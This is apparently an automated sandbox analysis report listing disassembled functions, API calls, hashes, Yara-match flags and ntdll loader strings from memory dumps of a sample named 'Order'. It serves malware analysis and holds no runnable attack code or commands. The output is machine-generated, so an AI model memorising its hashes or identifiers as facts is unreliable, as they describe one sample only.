                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2f6cd40fa9eef01796a1927e0609b4ba8c3dba1c62f70be6431c80a14f9d26f6
                                                                                                                                    • Instruction ID: b0df72744652b7c31aaf92622abfe7fb6aebb94900d9c1cf9ab1b118f9517fe9
                                                                                                                                    • Opcode Fuzzy Hash: 2f6cd40fa9eef01796a1927e0609b4ba8c3dba1c62f70be6431c80a14f9d26f6
                                                                                                                                    • Instruction Fuzzy Hash: C390023120258C02D610715C840874A404997D1301F59C415A4468658DC69A89917225
                                                                                                                                    Function 019835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: c0c939a93c28b8e75feb20c56ecad97798810c0564ebd9198a77f6635aa1a648
                                                                                                                                    • Instruction ID: 557956d374679bc0f0bbbf64abfedf452f7dee8df8cd1024f2f95341178e4442
                                                                                                                                    • Opcode Fuzzy Hash: c0c939a93c28b8e75feb20c56ecad97798810c0564ebd9198a77f6635aa1a648
                                                                                                                                    • Instruction Fuzzy Hash: 5A90023160660802D600715C4518706504997D1201F65C415A0468568DC79A8A5166A6
                                                                                                                                    Function 004141E1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00414260
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 1863I7301$1863I7301
                                                                                                                                    • API String ID: 1836367815-3745599348
                                                                                                                                    • Opcode ID: f82b3489c07bb7bba87b4eb726f7e6691780f768484c8221fa741478fa425193
                                                                                                                                    • Instruction ID: 849ad6b5b06dd9d477bcae3cc8e4cc54e2323083547425b7802f2d85772a6ce4
                                                                                                                                    • Opcode Fuzzy Hash: f82b3489c07bb7bba87b4eb726f7e6691780f768484c8221fa741478fa425193
                                                                                                                                    • Instruction Fuzzy Hash: E8012671E4021876EB11A6E19C02FDFBB7C9F40B54F04805AFE047B2C1D7B866468BEA
                                                                                                                                    Function 004141E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00414260
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 1863I7301$1863I7301
                                                                                                                                    • API String ID: 1836367815-3745599348
                                                                                                                                    • Opcode ID: a3f97eb2583523ad50d7cc5734a062fdc3966a9ffe998e370a34981ffe5104b2
                                                                                                                                    • Instruction ID: 6a1d244d1ea9186ec68e0d3c22f4e0bd750b285f4891b0904ac5698ca7436c9e
                                                                                                                                    • Opcode Fuzzy Hash: a3f97eb2583523ad50d7cc5734a062fdc3966a9ffe998e370a34981ffe5104b2
                                                                                                                                    • Instruction Fuzzy Hash: A301D671E4021876EB11A6E19C42FDFBB7C9F41B54F04805AFE047B2C1D6B866468BEA
                                                                                                                                    Function 0042CBE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 80 42cbe3-42cc27 call 404843 call 42db13 RtlAllocateHeap
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(?,0041E7BE,?,?,00000000,?,0041E7BE,?,?,?), ref: 0042CC22
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
                                                                                                                                    • Instruction ID: 1503fd3026b6a6c884018fb1076d2efb6d6f5d3df5eecbcf58bdfa754225d855
                                                                                                                                    • Opcode Fuzzy Hash: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
                                                                                                                                    • Instruction Fuzzy Hash: B7E06D762042047BDA10EE59DC41FDB37ACEFC8714F004419FE08A7241E770B9108AB8
                                                                                                                                    Function 0042CC33 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 85 42cc33-42cc77 call 404843 call 42db13 RtlFreeHeap
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C4830C75,00000007,00000000,00000004,00000000,0041720F,000000F4), ref: 0042CC72
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    • Opcode ID: 38eafd8a1ea63597223e5a1425a7c26f04ed257e1e495f63d6fb01429785e211
                                                                                                                                    • Instruction ID: 1c873b0a11d26d802b22e0b7b45bc634ffb0764c5d8b412d7deec3f1fea9b478
                                                                                                                                    • Opcode Fuzzy Hash: 38eafd8a1ea63597223e5a1425a7c26f04ed257e1e495f63d6fb01429785e211
                                                                                                                                    • Instruction Fuzzy Hash: 8AE06D763002057BD610EE59EC41EAB77ACEFC8714F104429FE08A7282DA70B9108BB8
                                                                                                                                    Function 0042CC83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 95 42cc83-42ccbc call 404843 call 42db13 ExitProcess
                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,174F840D,?,?,174F840D), ref: 0042CCB7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    • Opcode ID: 657fc2068f50c85c9734239eb842ba7256170667a099f2beb8aaa4f4faf4d97b
                                                                                                                                    • Instruction ID: ed91766b2cb9a97b247fab496e5ef85578791cc222d617aa0471655d34f62498
                                                                                                                                    • Opcode Fuzzy Hash: 657fc2068f50c85c9734239eb842ba7256170667a099f2beb8aaa4f4faf4d97b
                                                                                                                                    • Instruction Fuzzy Hash: 0DE04F763002147BD620EA5ADC42F97775CDFC5714F004429FA0CA7286D674BA0086B4
                                                                                                                                    Function 01982C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 100 1982c0a-1982c0f 101 1982c1f-1982c26 LdrInitializeThunk 100->101 102 1982c11-1982c18 100->102
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 027d32178a0435ad0977e20b44132e86b8b26ddd25450598ed125531e22185e0
                                                                                                                                    • Instruction ID: 5b0f52081c4d4733fb751602980a9f034584b4b957fee93a443d428cd56d2348
                                                                                                                                    • Opcode Fuzzy Hash: 027d32178a0435ad0977e20b44132e86b8b26ddd25450598ed125531e22185e0
                                                                                                                                    • Instruction Fuzzy Hash: 6AB09B71D025C5C5DF11F764460C717794477D1701F15C065D2074645F473DC1D1E275

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 019C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-2160512332
                                                                                                                                    • Opcode ID: cd3730a9dedb308a7feed1020f2b3b8ffec4669f255f8c5db433e2d51fcfda24
                                                                                                                                    • Instruction ID: 8cb89c777717e6a5040f1703828ca19638e8baefdbdddfe89c32c5496ecd0276
                                                                                                                                    • Opcode Fuzzy Hash: cd3730a9dedb308a7feed1020f2b3b8ffec4669f255f8c5db433e2d51fcfda24
                                                                                                                                    • Instruction Fuzzy Hash: A2924B71608342AFE721DF29C880B6BB7E8BB84B54F14492DFA98D7251D770E944CB93
                                                                                                                                    Function 01978620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • double initialized or corrupted critical section, xrefs: 019B5508
                                                                                                                                    • Critical section address, xrefs: 019B5425, 019B54BC, 019B5534
                                                                                                                                    • Thread identifier, xrefs: 019B553A
                                                                                                                                    • Critical section debug info address, xrefs: 019B541F, 019B552E
                                                                                                                                    • 8, xrefs: 019B52E3
                                                                                                                                    • Critical section address., xrefs: 019B5502
                                                                                                                                    • corrupted critical section, xrefs: 019B54C2
                                                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B54CE
                                                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B540A, 019B5496, 019B5519
                                                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B54E2
                                                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 019B5543
                                                                                                                                    • Invalid debug info address of this critical section, xrefs: 019B54B6
                                                                                                                                    • undeleted critical section in freed memory, xrefs: 019B542B
                                                                                                                                    • Address of the debug info found in the active list., xrefs: 019B54AE, 019B54FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                    • API String ID: 0-2368682639
                                                                                                                                    • Opcode ID: 29b9a771af36ff33b00e2f5e763928a648a4693497738b802508e7196d6b38b4
                                                                                                                                    • Instruction ID: f59bd7c4582975ed92c72bade9d7d67511cee92293280a04c94f0ab80f5adafa
                                                                                                                                    • Opcode Fuzzy Hash: 29b9a771af36ff33b00e2f5e763928a648a4693497738b802508e7196d6b38b4
                                                                                                                                    • Instruction Fuzzy Hash: D0817AB0A01358AFEB20CF99C985FAEBBF9BB88B15F114159F50CB7250D3B5A941CB50
                                                                                                                                    Function 019729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019B25EB
                                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019B22E4
                                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 019B2412
                                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 019B2602
                                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 019B261F
                                                                                                                                    • @, xrefs: 019B259B
                                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019B24C0
                                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 019B2498
                                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 019B2409
                                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 019B2624
                                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 019B2506
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                    • API String ID: 0-4009184096
                                                                                                                                    • Opcode ID: 7050ef8442b7dd724dd0fe2527fe9cf9e9ee87e488ad3364b8a2367cc5bd6726
                                                                                                                                    • Instruction ID: 92f2236fbbb79d4d360f87147869a8be30c8f08248d345b77801587a391a4517
                                                                                                                                    • Opcode Fuzzy Hash: 7050ef8442b7dd724dd0fe2527fe9cf9e9ee87e488ad3364b8a2367cc5bd6726
                                                                                                                                    • Instruction Fuzzy Hash: 9E027EB1D002299BDB31DB54CD80BEAB7B8AF54704F0445EAE64DA7241EB70AF84CF59
                                                                                                                                    Function 019E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                    • API String ID: 0-2515994595
                                                                                                                                    • Opcode ID: ec7417fccb309d1ad2d6256e0175612ee4fe1c35c70e1537c7814972c4f9c92c
                                                                                                                                    • Instruction ID: 6c1dc1d0e688de99cc78344f240f185c9e5bd499b7457d469b8c89b5c485de08
                                                                                                                                    • Opcode Fuzzy Hash: ec7417fccb309d1ad2d6256e0175612ee4fe1c35c70e1537c7814972c4f9c92c
                                                                                                                                    • Instruction Fuzzy Hash: 5851BF715043069BD32ADF98C888BABBBECEFD5640F14492DA95D83245E770D684CB92
                                                                                                                                    Function 019F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                    • API String ID: 0-1700792311
                                                                                                                                    • Opcode ID: 1d0e617ef22ee361c4d5e0069fd73ea59491d78a7c97cc2de88c0ccc88ce2c55
                                                                                                                                    • Instruction ID: 0fe8e6b005704623f7d012b434b726cd1e2e6fbb7d69ac49b652b8f93b5e2c41
                                                                                                                                    • Opcode Fuzzy Hash: 1d0e617ef22ee361c4d5e0069fd73ea59491d78a7c97cc2de88c0ccc88ce2c55
                                                                                                                                    • Instruction Fuzzy Hash: D0D1EF35600685EFDB22DF69C801AA9BBFAFF89715F09804DF64D9B252D734D981CB10
                                                                                                                                    Function 019C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • VerifierDlls, xrefs: 019C8CBD
                                                                                                                                    • VerifierDebug, xrefs: 019C8CA5
                                                                                                                                    • VerifierFlags, xrefs: 019C8C50
                                                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 019C8B8F
                                                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019C8A67
                                                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019C8A3D
                                                                                                                                    • HandleTraces, xrefs: 019C8C8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                    • API String ID: 0-3223716464
                                                                                                                                    • Opcode ID: 398bc7e47afc222efaf577fd811b095caca3718cac7e13c39e5b3925e4e3bc37
                                                                                                                                    • Instruction ID: 1ec64fba8b2e8d9dc439b784c4aa52c8413a683a6499b28523f2c81c5aee6f50
                                                                                                                                    • Opcode Fuzzy Hash: 398bc7e47afc222efaf577fd811b095caca3718cac7e13c39e5b3925e4e3bc37
                                                                                                                                    • Instruction Fuzzy Hash: 2E91F2B1A41716AFD721DF6CD880F5A7BA8ABD4F14F05082CFA8D6B244C770AD01CB96
                                                                                                                                    Function 0194EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                    • API String ID: 0-1109411897
                                                                                                                                    • Opcode ID: a42fb4fd5549614875b4e252be6bbe3c2217ff86f09e9a3d4aec93651bf5ac38
                                                                                                                                    • Instruction ID: e7d02a75a9758377cdd10d633e5d3dc2fdef89ba3d85b210050c293e44af518f
                                                                                                                                    • Opcode Fuzzy Hash: a42fb4fd5549614875b4e252be6bbe3c2217ff86f09e9a3d4aec93651bf5ac38
                                                                                                                                    • Instruction Fuzzy Hash: 26A26870E0562A8FDB64CF18CC88BA9BBB5BF89705F5442E9D90DA7250DB749E84CF40
                                                                                                                                    Function 019763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-792281065
                                                                                                                                    • Opcode ID: 87dca22ece9a59b2550f97d14bb9d6919d73a53b859edcade862ffc72fda43ed
                                                                                                                                    • Instruction ID: 8a194ece3d4de41b333b8f4e2f7a5b87996a2832fea06b3a84af365a9bb0e240
                                                                                                                                    • Opcode Fuzzy Hash: 87dca22ece9a59b2550f97d14bb9d6919d73a53b859edcade862ffc72fda43ed
                                                                                                                                    • Instruction Fuzzy Hash: E8913730F04715EBFB25DF58DD84BEA7BA9BF91B24F000129E50D6B286D7749802D791
                                                                                                                                    Function 0193645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01999A2A
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01999A11, 01999A3A
                                                                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01999A01
                                                                                                                                    • apphelp.dll, xrefs: 01936496
                                                                                                                                    • LdrpInitShimEngine, xrefs: 019999F4, 01999A07, 01999A30
                                                                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019999ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-204845295
                                                                                                                                    • Opcode ID: 3b45b53a79fc4be7a96cacdb3ee8bab821aaab35fdabceb06afe90d3d25286d5
                                                                                                                                    • Instruction ID: ab0a350b402af3bb2dc1046fe3a4a588fd06eb77cb8e41e0e754b737fd6f013d
                                                                                                                                    • Opcode Fuzzy Hash: 3b45b53a79fc4be7a96cacdb3ee8bab821aaab35fdabceb06afe90d3d25286d5
                                                                                                                                    • Instruction Fuzzy Hash: 46518071608305ABEB25DF28D841FAB7BE9FFC4648F00091DF58D971A4D634EA45CB92
                                                                                                                                    Function 0197C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 019B8181, 019B81F5
                                                                                                                                    • LdrpInitializeProcess, xrefs: 0197C6C4
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0197C6C3
                                                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 019B8170
                                                                                                                                    • LdrpInitializeImportRedirection, xrefs: 019B8177, 019B81EB
                                                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 019B81E5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                    • API String ID: 0-475462383
                                                                                                                                    • Opcode ID: d94202eb90cd8a836f791c6066bd642b39baf3d65f891bcdd6fa8204d0808afe
                                                                                                                                    • Instruction ID: ea764fe4f38fe3e067b68167b6160267f75f99d61f8de29df03e62620820e8e4
                                                                                                                                    • Opcode Fuzzy Hash: d94202eb90cd8a836f791c6066bd642b39baf3d65f891bcdd6fa8204d0808afe
                                                                                                                                    • Instruction Fuzzy Hash: 3B31F271644307ABC224EF68DD86E6A77D8FFD4B10F04051CF98CAB295E620ED05CBA2
                                                                                                                                    Function 01972674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 019B2180
                                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 019B2178
                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019B21BF
                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 019B2165
                                                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 019B219F
                                                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 019B2160, 019B219A, 019B21BA
                                                                                                                                    Memory Dump Source
